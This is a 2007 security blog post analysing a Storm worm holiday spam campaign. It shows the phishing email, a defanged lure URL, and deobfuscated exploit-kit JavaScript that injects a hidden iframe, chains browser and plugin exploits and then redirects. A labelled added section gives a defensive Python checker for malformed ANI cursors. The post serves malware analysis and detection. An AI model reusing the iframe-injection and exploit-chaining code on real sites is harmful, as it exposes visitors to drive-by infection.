Monday, December 24, 2007

Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!


We just received a handful of these in our mail drops. Looks like the grinch still runs storm.
Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

hey,

I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/

Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100

In place of MerryChristmasDude, the same site also turns up under ltbrew, tibeam, etc.

JSDecode (See previous post) has no issues with this javascript, and cleans it up to show:

var script = document.createElement("script");

script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");

document.body.appendChild(script);


So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...

It took two passes, but JSDecode did its job:

....snip...
function startANI() {
var ifr = document.createElement("div");
document.body.appendChild(ifr);
// hidden 1x1 iframe pulls in the ANI stage
ifr.innerHTML = '<iframe src="?o2&p=595022058&r=2792316769" height="1" width="1"></iframe>';
return 0;
}

if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);
...snip...

The ANI looks fun:
From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html

------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]
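Added example (not code from the original post): a small Python triage script that walks an MHTML message like the one above, decodes the base64 application/octet-stream part and checks whether it is an ANI cursor whose "anih" chunk is malformed. The check is the standard heuristic for the MS05-002 family: a well-formed ANIHEADER is nine DWORDs (36 bytes), so an "anih" chunk declaring any other length, a second "anih" chunk, or a truncated one is flagged. The sample MHTML, the `sample.invalid` Content-Location values and the `build_ani`/`build_sample` helpers are constructed here for the demonstration and are not from the campaign.

```python
import base64
import email
import struct
from email import policy

# ANIHEADER: cbSizeof, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags
# -> nine DWORDs, 36 bytes. MS05-002-style exploits declare a different length.
ANIH_EXPECTED_SIZE = 36


def riff_chunks(data):
    """Yield (fourcc, declared_size, payload) for each top-level RIFF chunk."""
    if len(data) < 12 or data[:4] != b"RIFF":
        return
    pos = 12  # skip 'RIFF', container size and form type ('ACON' for cursors)
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        payload = data[pos + 8:pos + 8 + size]
        yield fourcc, size, payload
        pos += 8 + size + (size & 1)  # chunks are word-aligned


def check_ani(data):
    """Return a list of findings for an ANI blob; an empty list means nothing odd."""
    findings = []
    if data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not an ANI file"]
    seen_anih = 0
    for fourcc, size, payload in riff_chunks(data):
        if fourcc != b"anih":
            continue
        seen_anih += 1
        if seen_anih > 1:
            findings.append("duplicate anih chunk")
        if size != ANIH_EXPECTED_SIZE:
            findings.append("anih chunk length %d != %d" % (size, ANIH_EXPECTED_SIZE))
        if len(payload) < size:
            findings.append("anih chunk truncated")
    if seen_anih == 0:
        findings.append("no anih chunk")
    return findings


def scan_mhtml(raw):
    """Walk an MHTML message and report (Content-Location, type, findings) for binary parts."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_content_type() != "application/octet-stream":
            continue
        loc = part.get("Content-Location", "")
        payload = part.get_payload(decode=True) or b""  # base64 is decoded here
        if payload[:4] == b"RIFF":
            findings = check_ani(payload)
        else:
            findings = ["opaque binary part"]
        report.append((loc, part.get_content_type(), findings))
    return report


# --- constructed test data (hypothetical, not from the campaign) ---------------

def build_ani(anih_size):
    """Minimal ANI whose anih chunk declares the given length (36 is well-formed)."""
    header = struct.pack("<9I", 36, 1, 1, 32, 32, 32, 1, 1, 1)
    anih_payload = header[:anih_size].ljust(anih_size, b"\x00")
    chunk = b"anih" + struct.pack("<I", anih_size) + anih_payload
    body = b"ACON" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def build_sample(ani_bytes):
    """MHTML in the same shape as the captured message, carrying ani_bytes as 1.dat."""
    boundary = "----=_NextPart_SAMPLE"
    b64 = base64.encodebytes(ani_bytes).decode()
    text = (
        "MIME-Version: 1.0\n"
        'Content-Type: multipart/related; type="text/html"; boundary="%s"\n\n'
        "--%s\n"
        'Content-Type: text/html; charset="windows-1251"\n'
        "Content-Location: http://sample.invalid/index.html\n\n"
        "<html></html>\n"
        "--%s\n"
        "Content-Type: application/octet-stream\n"
        "Content-Transfer-Encoding: base64\n"
        "Content-Location: http://sample.invalid/1.dat\n\n"
        "%s\n"
        "--%s--\n"
    ) % (boundary, boundary, boundary, b64, boundary)
    return text.encode()


if __name__ == "__main__":
    for label, size in (("well-formed", 36), ("oversized anih", 0x400)):
        print(label, scan_mhtml(build_sample(build_ani(size))))
```

Run it on a saved `.mht`/`.eml` by passing the file's bytes to `scan_mhtml`; anything other than an empty findings list for a Content-Location ending in `.dat` is worth pulling into a sandbox.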


Once run in the sandbox, %windir%/disnisa.exe is the dropped binary and %windir%/disnisa.config holds the peer list.

Same old storm, binary changes every few seconds, and someone's going to fall for it.

Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario).
